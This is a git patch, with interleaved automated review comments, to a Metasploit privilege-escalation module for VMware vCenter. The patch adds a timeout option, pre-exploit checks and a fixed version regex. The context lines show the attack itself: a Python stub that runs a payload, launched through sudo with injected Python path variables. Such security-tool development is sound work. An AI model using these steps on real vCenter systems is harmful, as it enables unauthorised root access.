From bca3626cf2585acb857b769f2070d76df9bf7c31 Mon Sep 17 00:00:00 2001
From: h00die
Date: Wed, 4 Dec 2024 18:39:43 -0500
Subject: [PATCH] peer review

---
 .../exploits/linux/local/vcenter_sudo_lpe.rb | 23 ++++++++++++-------
 1 file changed, 15 insertions(+), 8 deletions(-)

diff --git a/modules/exploits/linux/local/vcenter_sudo_lpe.rb b/modules/exploits/linux/local/vcenter_sudo_lpe.rb
index 329b1db14ac8..88dc67f2bd28 100644
--- a/modules/exploits/linux/local/vcenter_sudo_lpe.rb
+++ b/modules/exploits/linux/local/vcenter_sudo_lpe.rb
@@ -54,7 +54,8 @@ def initialize(info = {})
       )
     )
     register_advanced_options [
-      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
+      OptInt.new('TIMEOUT', [ true, 'Command timeout', 30 ])
     ]
   end
 
@@ -68,7 +69,7 @@ def check
     # VMware vCenter Server Appliance 6.5.0.0 Build 16197320
     # we want to try to make this build number Rex::Version friendly. https://rubular.com/r/BNLDjy0C862cdS
     # technically we only care about major release 7 and 8, however we'll try to future proof w/ \d instead
-    return CheckCode::Safe("Unable to determine vcenter build from output: #{vbuild}") unless /(\d\.\d\.\d) build[- ](\d+)/i =~ vbuild
+    return CheckCode::Safe("Unable to determine vcenter build from output: #{vbuild}") unless /(\d+\.\d+\.\d+) build[- ](\d+)/i =~ vbuild
 
     vbuild_version = Rex::Version.new("#{Regexp.last_match(1)}.#{Regexp.last_match(2)}")
 
@@ -106,9 +107,8 @@ def exploit_operator_group
     write_file(payload_stub, "import os\nos.system('#{payload_path}')\nquit()")
     register_files_for_cleanup(payload_stub)
 
-    timeout = 30
     print_status 'Launching exploit...'
-    output = cmd_exec "sudo PYTHONPATH=#{base_dir} #{vuln_exe}", nil, timeout
+    output = cmd_exec "sudo PYTHONPATH=#{base_dir} #{vuln_exe}", nil, datastore['TIMEOUT']
     output.each_line { |line| vprint_status line.chomp }
   end
 
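Review bot: The description on the new `OptInt.new('TIMEOUT', ...)` line gives no unit, and an operator reading `Command timeout` has to guess whether 30 is seconds or milliseconds; as I read cmd_exec, its third argument is seconds, so `OptInt.new('TIMEOUT', [ true, 'Command timeout in seconds', 30 ])` would remove the guess. Nothing rejects 0 or a negative value either; if cmd_exec treats those as "no timeout" rather than an error, that is worth a word in the description, but I cannot confirm its behaviour from here. The enclosing `initialize` begins before this hunk.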
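Review bot: The widened regex on the added `return CheckCode::Safe(...) unless` line is unanchored and captures exactly three numeric components, so on a four-component string like the `6.5.0.0 Build 16197320` example in the comment directly above it, backtracking makes the group match the trailing `5.0.0` and the leading major number is silently dropped before Rex::Version.new on the next line sees it. Whether the appliance really prints four components I cannot tell from this hunk, but the comment suggests it and the `build[- ]` alternation shows more than one output format is expected, so the check could report a wrong version rather than failing loudly. Forbidding a digit or dot immediately before the match and tolerating an optional fourth component fixes it while keeping the major.minor.patch.build shape the next line builds: `unless /(?<![\d.])(\d+\.\d+\.\d+)(?:\.\d+)? build[- ](\d+)/i =~ vbuild`. `check` starts before this hunk and continues after it.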
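Review bot: The launch tail on the new side (`print_status`, the cmd_exec call that now reads `datastore['TIMEOUT']`, and the output loop) is repeated verbatim in exploit_pod_user and exploit_admin_group with only the command string differing, which is why this one-option change had to touch three methods. A private helper taking the command would leave each exploit_* method with a single call such as `launch_sudo_command("sudo PYTHONPATH=#{base_dir} #{vuln_exe}")`, and any future change to timeout handling or output reporting lands in one place. The helper is sketched below; exploit_operator_group begins before this hunk.
```ruby
  # Run +cmd+ through cmd_exec with the operator-supplied TIMEOUT and echo each
  # output line at verbose level. Shared by the three exploit_* paths, which
  # differ only in the sudo command they launch.
  def launch_sudo_command(cmd)
    print_status 'Launching exploit...'
    output = cmd_exec(cmd, nil, datastore['TIMEOUT'])
    output.each_line { |line| vprint_status line.chomp }
  end
```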
@@ -128,9 +128,8 @@ def exploit_pod_user
     write_file(payload_stub, "import os\nos.system('#{payload_path}')\nquit()")
     register_files_for_cleanup(payload_stub)
 
-    timeout = 30
     print_status 'Launching exploit...'
-    output = cmd_exec "sudo VMWARE_PYTHON_PATH=#{base_dir} install-parameter", nil, timeout
+    output = cmd_exec "sudo VMWARE_PYTHON_PATH=#{base_dir} install-parameter", nil, datastore['TIMEOUT']
     output.each_line { |line| vprint_status line.chomp }
   end
 
@@ -150,13 +149,19 @@ def exploit_admin_group
     write_file(payload_stub, "import os\nos.system('#{payload_path}')\nquit()")
     register_files_for_cleanup(payload_stub)
 
-    timeout = 30
     print_status 'Launching exploit...'
-    output = cmd_exec "sudo VMWARE_PYTHON_BIN=#{payload_path} /bin/dcli", nil, timeout
+    output = cmd_exec "sudo VMWARE_PYTHON_BIN=#{payload_path} /bin/dcli", nil, datastore['TIMEOUT']
     output.each_line { |line| vprint_status line.chomp }
   end
 
   def exploit
+    if !datastore['ForceExploit'] && is_root?
+      fail_with(Failure::None, 'Session already has root privileges. Set ForceExploit to override')
+    end
+    unless writable?(base_dir)
+      fail_with(Failure::BadConfig, "#{base_dir} is not writable")
+    end
+
     @user = cmd_exec('whoami').chomp if @user.nil?
     @groups = cmd_exec('groups').chomp.split(' ') if @groups.nil?
     if @user == 'pod'
@@ -165,6 +170,8 @@ def exploit
       exploit_operator_group
     elsif @groups.include? 'admin'
       exploit_admin_group
+    else
+      fail_with(Failure::BadConfig, "User not vulnerable or not in correct group. (#{@user}:#{@groups})")
     end
   end
 end
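Review bot: The new `else` branch reports a session user who is neither `pod` nor in the operator or admin group as `Failure::BadConfig`, but no datastore option can change that — it is the identity of the session the module was run against — so `Failure::NoAccess` describes the situation more accurately and keeps the framework's failure reason meaningful for anyone triaging the run. The message also interpolates `@groups`, an Array, which prints in inspect form (`["users", "vami"]`); `@groups.join(' ')` reads cleaner. Combined: `fail_with(Failure::NoAccess, "#{@user} (groups: #{@groups.join(' ')}) is not pod and not in the operator or admin group")`. `exploit` begins in the previous hunk.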